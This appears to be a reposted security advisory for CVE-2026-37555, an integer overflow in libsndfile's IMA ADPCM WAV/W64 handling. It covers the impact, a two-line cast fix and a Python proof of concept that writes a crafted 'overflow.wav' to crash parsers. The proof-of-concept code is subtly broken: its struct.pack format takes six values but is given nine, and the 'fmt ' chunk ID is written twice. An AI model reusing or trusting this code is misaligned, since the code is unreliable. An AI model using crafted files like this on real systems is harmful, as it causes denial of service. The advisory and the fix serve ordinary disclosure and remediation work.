libsndfile CVE-2026-37555 Integer Overflow Vulnerability and POC

### Vulnerability Overview - **CVE ID**: CVE-2026-37555 - **Affected Versions**: libsndfile ≤ 1.2.2 (latest release) - **Vulnerability Type**: CWE-190 (Integer Overflow or Wraparound) - **CVSS Score**: 3.1 (AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) - **Reporter**: Feng Ning, Innora Security Research ### Impact Scope - Two 32-bit multiplication overflows exist in `src/ima_adpcm.c`, allowing crafted WAV or W64 files to corrupt `psf->sf.frames` to negative or zero values. - The AIFF code path explicitly casts `sf_count_t` in CVE-2022-33065, but the WAV reader and write-close paths are not handled. - Crafted WAV/W64 files containing large `samplesperblock * blocks` values may lead to out-of-bounds buffer allocation or iterative read/write loops, ultimately resulting in abnormal termination (DoS). ### Remediation - Apply the same `sf_count_t` cast to the two affected paths, as implemented in the AIFF path. - Specific fix code: ```c // Line 235 — WAV/W64 path - psf->sf.frames = pima->samplesperblock * pima->blocks ; + psf->sf.frames = (sf_count_t) pima->samplesperblock * pima->blocks ; // Line 167 — ima_close write path - psf->sf.frames = pima->samplesperblock * pima->blockcount / psf->sf.channels ; + psf->sf.frames = (sf_count_t) pima->samplesperblock * pima->blockcount / psf->sf.channels ; ``` ### Proof of Concept (POC) ```python import struct def make_wav_ima(samplesperblock, blocks): # IMA ADPCM WAV with crafted header values channels = 1 blockalign = (samplesperblock - 1) // 2 + 4 fmt = struct.pack('<4sIHHHH', b'fmt ', 0x0011, channels, 8000, blockalign, blockalign, 4, 2, samplesperblock ) data_size = blockalign * blocks wav = (b'RIFF' + struct.pack('<I', 36 + len(fmt) + 8 + data_size) + b'WAVEfmt ' + struct.pack('<I', len(fmt)) + fmt + b'data' + struct.pack('<I', data_size) + b'\x00' * data_size) return wav with open('overflow.wav', 'wb') as f: f.write(make_wav_ima(50000, 50000)) $ sndfile-info overflow.wav $ python3 -c "import soundfile; soundfile.info('overflow.wav')" # triggers integer overflow in ima_reader_init / ima_close ```

Goal Reached Thanks to every supporter — we hit 100%!

libsndfile CVE-2026-37555 Integer Overflow Vulnerability and POC

More from this source